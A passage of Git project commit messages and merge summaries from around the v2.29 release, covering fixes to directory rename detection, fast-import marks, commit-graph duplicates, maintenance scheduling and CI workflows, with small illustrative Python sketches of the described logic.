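    # "-S%s" so that it is parsed as the signing option.
    args = ["merge", "-s", "octopus"]
    if gpg_sign_key:
        args.append("-S%s" % gpg_sign_key)
    return args


print(merge_args_buggy("ABCD1234"))
print(merge_args_fixed("ABCD1234"))
```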
Fix the issue and add test cases as suggested by Johannes Schindelin and
Junio C Hamano.
Signed-off-by: Samuel Čavoj <samuel@cavoj.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* https://github.com/prati0100/git-gui:
git-gui: blame: prevent tool tips from sticking around after Command-Tab
git-gui: improve dark mode support
git-gui: fix mixed tabs and spaces; prefer tabs
Make sure `git gui blame` tooltips are destroyed once the window loses
focus on MacOS.
* sh/blame-tooltip:
git-gui: blame: prevent tool tips from sticking around after Command-Tab
On Mac, tooltips are not automatically removed when a window loses
focus. Furthermore, mouse-move events are only dispatched to the active
window, which means that if we Command-tab to another application while
a tool tip is showing, the tool tip will stay there forever (in front of
other applications). So we must hide it manually when we lose focus.
Do this unconditionally here (i.e. without if {[is_MacOSX]}); it
shouldn't hurt on other platforms, even though they don't seem to have
this problem.
Signed-off-by: Stefan Haller <stefan@haller-berlin.de>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
Per IRC:
[19:52] <lkmandy> With respect to the MyFirstContribution tutorial, I
will like to suggest this - Under the section "Adding Documentation",
just before the "make all doc" command, it will be really helpful to
prompt a user to check if they have the asciidoc package installed, if
they don't, the command should be provided or they can just be pointed
to install it
So, let's move the note about the dependency to before the build command
blockquote.
Signed-off-by: Emily Shaffer <emilyshaffer@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make `git credential fill` honour the core.askPass variable.
Signed-off-by: Thomas Koutcher <thomas.koutcher@online.fr>
[jk: added test]
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Testcases 12b and 12c were both slightly weird; they were marked as
having a weird resolution, but with the note that even straightforward
simple rules can give weird results when the input is bizarre.
However, during optimization work for merge-ort, I discovered a
significant speedup that is possible if we add one more fairly
straightforward rule: we don't bother doing directory rename detection
if there are no new files added to the directory on the other side of
the history to be affected by the directory rename. This seems like an
obvious and straightforward rule, but there was one funny corner case
where directory rename detection could affect only existing files: the
funny corner case where two directories are renamed into each other on
opposite sides of history. In other words, it only results in a
different output for testcases 12b and 12c.
Since we already thought testcases 12b and 12c were weird anyway, and
because the optimization often has a significant effect on common cases
(but is entirely prevented if we can't change how 12b and 12c function),
let's add the additional rule and tweak how 12b and 12c work. Split
both testcases into two (one where we add no new files, and one where
the side that doesn't rename a given directory will add files to it),
and mark them with the new expectation.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While investigating the issues highlighted by the testcase in the
previous patch, I also found a shortcoming in the directory rename
detection rules. Split testcase 6b into two to explain this issue
and update directory-rename-detection.txt to remove one of the previous
rules that I now believe to be detrimental. Also, update the wording
around testcase 8e; while we are not modifying the results of that
testcase, we were previously unsure of the appropriate resolution of
that test and the new rule makes the previously chosen resolution for
that testcase a bit more solid.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a new testcase modelled on a real world repository example that
served multiple purposes:
* it uncovered a bug in the current directory rename detection
implementation.
* it is a good test of needing to do directory rename detection for
a series of commits instead of just one (and uses rebase instead
of just merge like all the other tests in this testfile).
* it is an excellent stress test for some of the optimizations in
my new merge-ort engine
I can expand on the final item later when I have submitted more of
merge-ort, but the bug is the main immediate concern. It arises as
follows:
* dir/subdir/ has several files
* almost all files in dir/subdir/ are renamed to folder/subdir/
* one of the files in dir/subdir/ is renamed to folder/subdir/newsubdir/
* If the other side of history (that doesn't do the renames) adds a
new file to dir/subdir/, where should it be placed after the merge?
The most obvious two choices are: (1) leave the new file in dir/subdir/,
don't make it follow the rename, and (2) move the new file to
folder/subdir/, following the rename of most of the files. However,
there's a possible third choice here: (3) move the new file to
folder/subdir/newsubdir/. Having this many plausible choices reinforces
the fact that merge.directoryRenames=conflict is a good default: the merge
machinery needs to stick the file somewhere and notify the user of the
possibility that they might want to place it elsewhere. Surprisingly,
the current code would always choose (3), while the real world
repository was clearly expecting (2) -- move the file along with where
the herd of files was going, not with the special exception.
The problem here is that for the majority of the file renames,
dir/subdir/ -> folder/subdir/
is actually represented as
dir/ -> folder/
This directory rename would have a big weight associated with it since
most of the files followed that rename. However, we always consult the
most immediate directory first, and there is only one rename rule for
it:
dir/subdir/ -> folder/subdir/newsubdir/
Since this rule is the only one for mapping from dir/subdir/, it
automatically wins and that directory rename was followed instead of the
desired dir/subdir/ -> folder/subdir/.
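The effect can be reproduced with a small model. The Python sketch below
is a simplification under stated assumptions, not the merge machinery
itself: the helper names are hypothetical, a directory rename is derived
by stripping matching trailing path components, and each source
directory simply takes its most common target.

```python
from collections import Counter, defaultdict
import posixpath


def dir_rename_rule(old_path, new_path):
    """Derive a directory rename from one file rename.

    Matching trailing directory components are stripped, which is why
    dir/subdir/a -> folder/subdir/a is recorded as dir -> folder.
    """
    old_dir = posixpath.dirname(old_path).split("/")
    new_dir = posixpath.dirname(new_path).split("/")
    while old_dir and new_dir and old_dir[-1] == new_dir[-1]:
        old_dir.pop()
        new_dir.pop()
    return "/".join(old_dir), "/".join(new_dir)


def best_rules(file_renames):
    """Pick the most common target for every renamed source directory."""
    votes = defaultdict(Counter)
    for old_path, new_path in file_renames:
        old_dir, new_dir = dir_rename_rule(old_path, new_path)
        if old_dir != new_dir:
            votes[old_dir][new_dir] += 1
    return {old: c.most_common(1)[0][0] for old, c in votes.items()}


def place_new_file(path, rules):
    """Apply the rule for the most immediate directory that has one."""
    directory = posixpath.dirname(path)
    while directory:
        if directory in rules:
            return rules[directory] + path[len(directory):]
        directory = posixpath.dirname(directory)
    return path


renames = [
    ("dir/subdir/a", "folder/subdir/a"),
    ("dir/subdir/b", "folder/subdir/b"),
    ("dir/subdir/c", "folder/subdir/c"),
    ("dir/subdir/d", "folder/subdir/newsubdir/d"),
]
rules = best_rules(renames)
placed = place_new_file("dir/subdir/new.txt", rules)
print(rules)
print(placed)
```

In this model the three ordinary renames all vote for dir -> folder,
while the single exception is the only vote for dir/subdir, so the new
file follows the exception into folder/subdir/newsubdir/.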
Unfortunately, the fix is a bit involved so for now just add the
testcase documenting the issue.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The regression tests for directory rename detection were renamed from
t6043 to t6423 in commit 919df31955 ("Collect merge-related tests to
t64xx", 2020-08-10); update this file to match. Also, add a small
clarification to nearby text while we're at it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reimplement the `bisect_state()` shell functions in C and also add a
subcommand `--bisect-state` to `git-bisect--helper` to call them from
git-bisect.sh.
Using `--bisect-state` subcommand is a temporary measure to port shell
function to C so as to use the existing test suite. As more functions
are ported, this subcommand will be retired and will be called by some
other methods.
`bisect_head()` is only called from `bisect_state()`, thus it is not
required to introduce another subcommand.
Note that the `eval` in the changed line of `git-bisect.sh` cannot be
dropped: it is necessary because the `rev` and the `tail`
variables may contain multiple, quoted arguments that need to be
passed to `bisect--helper` (without the quotes, naturally).
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Reviewed-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add the subcommand to `git bisect--helper` and call it from
git-bisect.sh.
With the conversion of `bisect_auto_next()` from shell to C in a
previous commit, `bisect_start()` can now be fully ported to C.
So let's complete the `--bisect-start` subcommand of
`git bisect--helper` so that it fully implements `bisect_start()`,
and let's use this subcommand in `git-bisect.sh` instead of
`bisect_start()`.
Note that the `eval` in the changed line of `git-bisect.sh` cannot be
dropped: it is necessary because the `rev` and the `tail`
variables may contain multiple, quoted arguments that need to be
passed to `bisect--helper` (without the quotes, naturally).
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Reviewed-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
- Fix wrong script in completion configuration. zsh wants bash completion
path here, not path to itself.
- Add `compinit` autoload command, since whole thing didn't work
if it is not loaded.
Signed-off-by: Alexey <lesha.ogonkov@gmail.com>
Reviewed-by: Stefan Haller <lists@haller-berlin.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 1bdca81641 (fast-import: add options for rewriting submodules,
2020-02-22) accidentally added two lines parsing the option
"rewrite-submodules-from". This didn't do anything in practice, because
they're in an if/else chain and so the second one can never trigger.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The template is a more-or-less exact translation to shell of the C
code for the default behaviour for git's push-to-checkout hook defined
in the push_to_deploy() function in builtin/receive-pack.c, to serve
as a convenient starting point for modification.
It also contains relevant text extracted from the git-config(1) and
githooks(5) man pages.
Signed-off-by: Adam Spiers <git@adamspiers.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It's an easy mistake to define a variable in a header with "int x;" when
you really meant to only declare the variable as "extern int x;"
instead. Clang and gcc will both allow this when building with
"-fcommon"; they put these "tentative definitions" in a common block
which the linker is able to resolve.
This is the default in clang and was the default in gcc until gcc-10,
since it helps some legacy code. However, we would prefer not to rely on
this because:
- using "extern" makes the intent more clear (so it's a style issue,
but it's one the compiler can help us catch)
- according to the gcc manpage, it may yield a speed and code size
penalty
So let's build explicitly with -fno-common when the DEVELOPER knob is
set, which will let developers using clang and older versions of gcc
notice these problems.
I didn't bother making this conditional on a particular version of gcc.
As far as I know, this option has been available forever in both gcc and
clang, so old versions don't need to avoid it. And we already expect gcc
and clang options throughout config.mak.dev, so it's unlikely anybody
setting the DEVELOPER knob is using anything else. It's a noop on
gcc-10, of course, but it's not worth trying to exclude it there.
Note that there's nothing to fix in the code; we already don't have any
issues here. But if you want to test the patch, you can add a bare "int
x;" into cache.h, which will cause the link step to fail.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'git maintenance run' subcommand takes a lock on the object database
to prevent concurrent processes from competing for resources. This is an
important safety measure to prevent possible repository corruption and
data loss.
This feature can lead to confusing behavior if a user is not aware of
it. Add a TROUBLESHOOTING section to the 'git maintenance' builtin
documentation that discusses these tradeoffs. The short version of this
section is that Git will not corrupt your repository, but if the list of
scheduled tasks takes longer than an hour then some scheduled tasks may
be dropped due to this object database collision. For example, a
long-running "daily" task at midnight might prevent an "hourly" task
from running at 1AM.
The opposite is also possible, but less likely as long as the "hourly"
tasks are much faster than the "daily" and "weekly" tasks.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'git maintenance (register|start)' subcommands add the current
repository to the global Git config so maintenance will operate on that
repository. They do not specify what maintenance should occur or how
often.
To make it simple for users to start background maintenance with a
recommended schedule, update the 'maintenance.strategy' config option in
both the 'register' and 'start' subcommands. This allows users to
customize beyond the defaults using individual
'maintenance.<task>.schedule' options, but also the user can opt-out of
this strategy using 'maintenance.strategy=none'.
Helped-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To provide an on-ramp for users to use background maintenance without
several 'git config' commands, create a 'maintenance.strategy' config
option. Currently, the only important value is 'incremental' which
assigns the following schedule:
* gc: never
* prefetch: hourly
* commit-graph: hourly
* loose-objects: daily
* incremental-repack: daily
These tasks are chosen to minimize disruptions to foreground Git
commands and use few compute resources.
The 'maintenance.strategy' is intended as a baseline that can be
customized further by manually assigning 'maintenance.<task>.enabled'
and 'maintenance.<task>.schedule' config options, which will override
any recommendation from 'maintenance.strategy'. This operates similarly
to config options like 'feature.experimental' which operate as "meta"
config options that change default config values.
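The override order can be sketched as below. This is a hedged Python
model rather than the actual config code: the `effective_schedule`
helper and the flat dictionary standing in for the config are
assumptions, only the '.schedule' override is modelled, and "never" is
represented as None.

```python
# Defaults assigned by the 'incremental' strategy, as listed above.
INCREMENTAL = {
    "gc": None,  # never scheduled
    "prefetch": "hourly",
    "commit-graph": "hourly",
    "loose-objects": "daily",
    "incremental-repack": "daily",
}


def effective_schedule(task, config):
    """Return the schedule for `task`, or None if it is never scheduled.

    An explicit maintenance.<task>.schedule value always wins; the
    strategy only supplies the default.
    """
    explicit = config.get("maintenance.%s.schedule" % task)
    if explicit is not None:
        return explicit
    if config.get("maintenance.strategy") == "incremental":
        return INCREMENTAL.get(task)
    return None


config = {
    "maintenance.strategy": "incremental",
    "maintenance.gc.schedule": "weekly",
}
for task in INCREMENTAL:
    print(task, effective_schedule(task, config))
```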
This presents a way forward for updating the 'incremental' strategy in
the future or adding new strategies. For example, a potential strategy
could be to include a 'full' strategy that runs the 'gc' task weekly
and no other tasks by default.
Helped-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The usage, die, warning, and error routines all work with a function
pointer that takes the message to be reported. We usually just mention
the function's full type inline. But this makes the use of these
pointers hard to read, especially because C's syntax for returning a
function pointer is so awful:
void (*get_error_routine(void))(const char *err, va_list params);
Unless you read it very carefully, this looks like a function pointer
declaration. Let's instead use a single typedef to define a reporting
function, which is the same for all four types.
Note that this also removes the "extern" from these declarations to
match the surrounding functions. They were missed in 554544276a (*.[ch]:
remove extern from function declarations using spatch, 2019-04-29)
presumably because of the unusual syntax.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fast-import stores its marks in a trie-like structure made of mark_set
structs. Each struct has a fixed size (1024). If our id number is too
large to fit in the struct, then we allocate a new struct which shifts
the id number by 10 bits. Our original struct becomes a child node
of this new layer, and the new struct becomes the top level of the trie.
This scheme was broken by ddddf8d7e2 (fast-import: permit reading
multiple marks files, 2020-02-22). Before then, we had a top-level
"marks" pointer, and the push-down worked by assigning the new top-level
struct to "marks". But after that commit, insert_mark() takes a pointer
to the mark_set, rather than using the global "marks". It continued to
assign to the global "marks" variable during the push down, which was
wrong for two reasons:
- we added a call in option_rewrite_submodules() which uses a separate
mark set; pushing down on "marks" is outright wrong here. We'd
corrupt the "marks" set, and we'd fail to correctly store any
submodule mappings with an id over 1024.
- the other callers passed "marks", but the push-down was still wrong.
In read_mark_file(), we take the pointer to the mark_set as a
parameter. So even though insert_mark() was updating the global
"marks", the local pointer we had in read_mark_file() was not
updated. As a result, we'd add a new level when needed, but then the
next call to insert_mark() wouldn't see it! It would then allocate a
new layer, which would also not be seen, and so on. Lookups for the
lost layers obviously wouldn't work, but before we even hit any
lookup stage, we'd generally run out of memory and die.
Our tests didn't notice either of these cases because they didn't have
enough marks to trigger the push-down behavior. The new tests in t9304
cover both cases (and fail without this patch).
We can solve the problem by having insert_mark() take a pointer-to-pointer
of the top-level of the set. Then our push down can assign to it in a
way that the caller actually sees. Note the subtle reordering in
option_rewrite_submodules(). Our call to read_mark_file() may modify our
top-level set pointer, so we have to wait until after it returns to
assign its value into the string_list.
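The push-down and the reason the caller must see the new top level can
be modelled in a few lines. The sketch below is in Python rather than C,
so returning the (possibly new) top stands in for the pointer-to-pointer
parameter; the class and function bodies are an illustrative
reconstruction from the description above, not the fast-import source.

```python
FANOUT = 1024  # slots per node
BITS = 10      # id bits consumed per level


class MarkSet:
    def __init__(self, shift=0):
        self.shift = shift
        self.slots = [None] * FANOUT


def insert_mark(top, idnum, value):
    """Store `value` under `idnum` and return the (possibly new) top."""
    # Push down: while the id does not fit, add a new top level whose
    # first child is the previous top.
    while (idnum >> top.shift) >= FANOUT:
        new_top = MarkSet(top.shift + BITS)
        new_top.slots[0] = top
        top = new_top
    node = top
    while node.shift:
        i = idnum >> node.shift
        idnum -= i << node.shift
        if node.slots[i] is None:
            node.slots[i] = MarkSet(node.shift - BITS)
        node = node.slots[i]
    node.slots[idnum] = value
    return top


def find_mark(top, idnum):
    """Return the value stored under `idnum`, or None if absent."""
    if (idnum >> top.shift) >= FANOUT:
        return None
    node = top
    while node is not None and node.shift:
        i = idnum >> node.shift
        idnum -= i << node.shift
        node = node.slots[i]
    return None if node is None else node.slots[idnum]


marks = MarkSet()
stale = marks  # a caller that never learns about the new top level
marks = insert_mark(marks, 5, "a")
marks = insert_mark(marks, 2000, "b")  # does not fit in 1024 slots
print(marks.shift, find_mark(marks, 5), find_mark(marks, 2000))
print(find_mark(stale, 2000))
```

A caller that keeps using `stale` is in the same position as the local
pointer in read_mark_file() before the fix: the new layer exists, but
that caller cannot reach it.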
Reported-by: Sergey Brester <serg.brester@sebres.de>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The existence of hashmap_free() and hashmap_free_entries() confused me,
and the docs weren't clear enough. We are dealing with a map table,
entries in that table, and possibly also things each of those entries
point to. I had to consult other source code examples and the
implementation. Add a brief note to clarify the differences. This will
become even more important once we introduce a new
hashmap_partial_clear() function which will add the question of whether
the table itself has been freed.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 7d78d5fc1a (ci: skip GitHub workflow runs for already-tested
commits/trees, 2020-10-08), we added a check that determines whether
there is already a workflow run for the given commit (or at least tree),
and if found, skips the current run.
We just worked around an issue with this check where older runs might
unexpectedly miss the `head_commit` attribute.
Let's be even more defensive by catching all kinds of exceptions,
logging them as warnings, and continuing the run without skipping it
(after all, if the check fails, we _want_ to continue with the run).
This commit is best viewed with the diff option `-w` because it
increases the indentation level of the GitHub Action script by two
spaces, surrounding it by a `try ... catch` construct.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Apparently older GitHub runs at least _sometimes_ lack information about
the `head_commit` (and therefore the `ci-config` check will fail with
"TypeError: Cannot read property 'tree_id' of null") in the check added
in 7d78d5fc1a (ci: skip GitHub workflow runs for already-tested
commits/trees, 2020-10-08).
Let's work around this by adding a defensive condition.
Reported-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
deref_tag() can return NULL. Exit gracefully in that case instead
of blindly dereferencing the return value.
.name shouldn't ever be NULL, but grep_object() handles that case
explicitly, so let's be defensive here as well and show the broken
object's ID if it happens to lack a name after all.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "git worktree list" shows the absolute path to the working tree,
the commit that is checked out and the name of the branch. It is not
immediately obvious which of the worktrees, if any, are locked.
"git worktree remove" refuses to remove a locked worktree with
an error message. If "git worktree list" told which worktrees
are locked in its output, the user would not even attempt to
remove such a worktree, or would realize that
"git worktree remove -f -f <path>" is required.
Teach "git worktree list" to append "locked" to its output.
The output from the command becomes like so:
$ git worktree list
/path/to/main abc123 [master]
/path/to/worktree 456def (detached HEAD)
/path/to/locked-worktree 123abc (detached HEAD) locked
Helped-by: Junio C Hamano <gitster@pobox.com>
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reduce the dependency on external tools by generating the distribution
archives for HTML documentation and manpages using git commands instead
of tar. This gives the archive entries the same meta data as those in
the dist archive for binaries.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Recently, a user had an issue due to combining
fetch.writeCommitGraph=true with core.commitGraph=false. The root bug
has been resolved by preventing commit-graph writes when
core.commitGraph is disabled. This happens inside the 'git commit-graph
write' command, but we can be more aware of this situation and prevent
that process from ever starting in the 'commit-graph' maintenance task.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
I am excited, because I like languages a lot, and because I believe this
is the way to contribute to a large number of Portuguese-speaking
people.
Jiang Xin and the previous Portuguese team gave me the lead. Thank you very
much. Honored to be a part of such a project.
Signed-off-by: Daniel Santos <hello@brighterdan.com>
Git 2.29-rc1
* tag 'v2.29.0-rc1' of github.com:git/git:
Git 2.29-rc1
doc: fix the bnf like style of some commands
doc: git-remote fix ups
doc: use linkgit macro where needed.
git-bisect-lk2009: make continuation of list indented
ci: do not skip tagged revisions in GitHub workflows
ci: skip GitHub workflow runs for already-tested commits/trees
tests: avoid using the branch name `main`
t1415: avoid using `main` as ref name
Makefile: ASCII-sort += lists
help: do not expect built-in commands to be hardlinked
index-pack: make get_base_data() comment clearer
index-pack: drop type_cas mutex
index-pack: restore "resolving deltas" progress meter
compat/mingw.h: drop extern from function declaration
GitHub workflow: automatically follow minor updates of setup-msbuild
t5534: split stdout and stderr redirection
The core.commitGraph config setting can be set to 'false' to prevent
parsing commits from the commit-graph file(s). This causes an issue when
trying to write with "--split" which needs to distinguish between
commits that are in the existing commit-graph layers and commits that
are not. The existing mechanism uses parse_commit() and follows by
checking if there is a 'graph_pos' that shows the commit was parsed from
the commit-graph file.
When core.commitGraph=false, we do not parse the commits from the
commit-graph and 'graph_pos' indicates that no commits are in the
existing file. The --split logic moves forward creating a new layer on
top that holds all reachable commits, then possibly merges down into
those layers, resulting in duplicate commits. The previous change makes
that merging process more robust to such a situation in case it happens
in the written commit-graph data.
The easy answer here is to avoid writing a commit-graph if reading the
commit-graph is disabled, since the resulting commit-graph would not
be read by subsequent Git processes. This is more natural than forcing
core.commitGraph to be true for the 'write' process.
Reported-by: Thomas Braun <thomas.braun@virtuell-zuhause.de>
Helped-by: Jeff King <peff@peff.net>
Helped-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Thomas reported [1] that a "git fetch" command was failing with an error
saying "unexpected duplicate commit id". The root cause is that they had
fetch.writeCommitGraph enabled which generates commit-graph chains, and
this instance was merging two layers that both contained the same commit
ID.
[1] https://lore.kernel.org/git/55f8f00c-a61c-67d4-889e-a9501c596c39@virtuell-zuhause.de/
The initial assumption is that Git would not write a commit ID into a
commit-graph layer if it already exists in a lower commit-graph layer.
Somehow, this specific case did get into that situation, leading to this
error.
While unexpected, this isn't actually invalid (as long as the two layers
agree on the metadata for the commit). When we parse a commit that does
not have a graph_pos in the commit_graph_data_slab, we use binary search
in the commit-graph layers to find the commit and set graph_pos. That
position is never used again in this case. However, when we parse a
commit from the commit-graph file, we load its parents from the
commit-graph and assign graph_pos at that point. If those parents were
already parsed from the commit-graph, then nothing needs to be done.
Otherwise, this graph_pos is a valid position in the commit-graph so we
can parse the parents, when necessary.
Thus, this die() is too aggressive. The easiest thing to do would be to
ignore the duplicates.
If we only ignore the duplicates, then we will produce a commit-graph
that has identical commit IDs listed in adjacent positions. This excess
data will never be removed from the commit-graph, which could cascade
into significantly bloated file sizes.
Thankfully, we can collapse the list to erase the duplicate commit
pointers. This allows us to get the end result we want without extra
memory costs and minimal CPU time.
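As a rough illustration of that collapse (a sketch only, not the code
in commit-graph.c; the function name and the use of plain strings in
place of commit pointers are assumptions), adjacent duplicates in a
sorted list can be erased in place with a single pass:

```python
def collapse_sorted_duplicates(oids):
    """Remove adjacent duplicates from a sorted list, in place.

    Hypothetical helper for illustration; `oids` stands in for the
    sorted list of commit pointers described above.
    """
    if not oids:
        return oids
    write = 1  # next slot to fill with an ID we have not kept yet
    for read in range(1, len(oids)):
        if oids[read] != oids[write - 1]:
            oids[write] = oids[read]
            write += 1
    del oids[write:]  # drop the leftover tail
    return oids


commits = sorted(["c3", "a1", "b2", "a1", "c3", "c3"])
collapse_sorted_duplicates(commits)
print(commits)
```

Because the list is already sorted, no extra set or copy is needed,
which matches the "no extra memory, minimal CPU" goal stated above.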
The root cause is due to disabling core.commitGraph, which prevents
parsing commits from the lower layers during a 'git commit-graph write
--split' command. Since we use the 'graph_pos' value to determine
whether a commit is in a lower layer, we never discover that those
commits are already in the commit-graph chain and add them to the top
layer. This layer is then merged down, creating duplicates.
The test added in t5324-split-commit-graph.sh fails without this change.
However, we still have not completely removed the need for this
duplicate check. That will come in a follow-up change.
Reported-by: Thomas Braun <thomas.braun@virtuell-zuhause.de>
Helped-by: Taylor Blau <me@ttaylorr.com>
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Not all developers are aware of `git diff --check` to warn
about whitespace issues. Running a check when a pull request is
opened or updated can save time for reviewers and the submitter.
A GitHub workflow will run when a pull request is created or the
contents are updated to check the patch series. A pull request
provides the necessary information (number of commits) to only
check the patch series.
To ensure the developer is aware of any issues, a comment will be
added to the pull request with the check errors.
Signed-off-by: Chris. Webster <chris@webstech.net>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Test preparation for the switch of default branch name continues.
* js/default-branch-name-part-3:
tests: avoid using the branch name `main`
t1415: avoid using `main` as ref name
The logic to skip testing on the tagged commit and the tag itself
was not quite consistent which led to failure of Windows test
tasks. It has been revamped to consistently skip revisions that
have already been tested, based on the tree object of the revision.
* js/ci-ghwf-dedup-tests:
ci: do not skip tagged revisions in GitHub workflows
ci: skip GitHub workflow runs for already-tested commits/trees
Doc fixes.
* ja/misc-doc-fixes:
doc: fix the bnf like style of some commands
doc: git-remote fix ups
doc: use linkgit macro where needed.
git-bisect-lk2009: make continuation of list indented
Hotfix and clean-up for the jt/threaded-index-pack topic that has
graduated to v2.29-rc0.
* jk/index-pack-hotfixes:
index-pack: make get_base_data() comment clearer
index-pack: drop type_cas mutex
index-pack: restore "resolving deltas" progress meter
In command line options, variables are entered between < and >
Signed-off-by: Jean-Noël Avila <jn.avila@free.fr>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When `master` is tagged, and then both `master` and the tag are pushed,
Travis CI will happily build both. That is a waste of energy, which is
why we skip the build for `master` in that case.
Our GitHub workflow is also triggered by tags. However, the run would
fail because the `windows-test` jobs are _not_ skipped on tags, but the
`windows-build` job _is_ skipped (and therefore fails to upload the
build artifacts needed by the test jobs).
In addition, we just added logic to our GitHub workflow that will skip
runs altogether if there is already a successful run for the same commit
or at least for the same tree.
Let's just change the GitHub workflow to no longer specifically skip
tagged revisions.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When pushing a commit that has already passed a CI or PR build
successfully, it makes sense to save some energy and time and skip the
new build.
Let's teach our GitHub workflow to do that.
For good measure, we also compare the tree ID, which is what we actually
test (the commit ID might have changed due to a reworded commit message,
which should not affect the outcome of the run).
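The decision described above could be sketched roughly as follows.
This is only an illustration: the function name and the shape of
`successful_runs` are assumptions, and the real workflow obtains its
data from GitHub rather than from an in-memory list.

```python
def should_skip_run(commit_id, tree_id, successful_runs):
    """Return True if an earlier successful run already covers this revision.

    `successful_runs` is a hypothetical iterable of (commit_id, tree_id)
    pairs for runs that passed.
    """
    for past_commit, past_tree in successful_runs:
        # Same commit, or a different commit with the same tree
        # (e.g. only the commit message was reworded).
        if past_commit == commit_id or past_tree == tree_id:
            return True
    return False


passed = [("c0ffee", "tree-1")]
print(should_skip_run("c0ffee", "tree-1", passed))
print(should_skip_run("decade", "tree-1", passed))
print(should_skip_run("decade", "tree-2", passed))
```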
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since Git now supports hashes other than SHA-1, the hash length isn't
guaranteed to be 40 characters. Replace $_x40 with a hash-agnostic OID
pattern.
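To illustrate the idea (a sketch, not the pattern used by the script
itself; the two lengths below assume SHA-1 and SHA-256 object names),
a hash-agnostic match could look like this:

```python
import re

# Assumed lengths: 40 hex digits for SHA-1, 64 for SHA-256.
OID_PATTERN = re.compile(r"\b(?:[0-9a-f]{40}|[0-9a-f]{64})\b")


def find_oids(text):
    """Return every full-length object ID found in `text`."""
    return OID_PATTERN.findall(text)


sha1 = "a" * 40
sha256 = "b" * 64
print(find_oids(f"old {sha1} new {sha256}"))
```

A pattern hard-coded to 40 characters would miss the second ID
entirely.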
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the git-resurrect script, there are a few lines that are mistakenly
indented with spaces. Replace these lines with tabs.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the near future, we want to change Git's default branch name to
`main`. In preparation for that, stop using it as a branch name in the
test suite. Replace that branch name by `topic`, the same name we used
to rename variations of `master` in b6211b89eb (tests: avoid variations
of the `master` branch name, 2020-09-26).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for a patch series that will change the fall-back for
`init.defaultBranch` to `main`, let's not use `main` as ref name in this
test script.
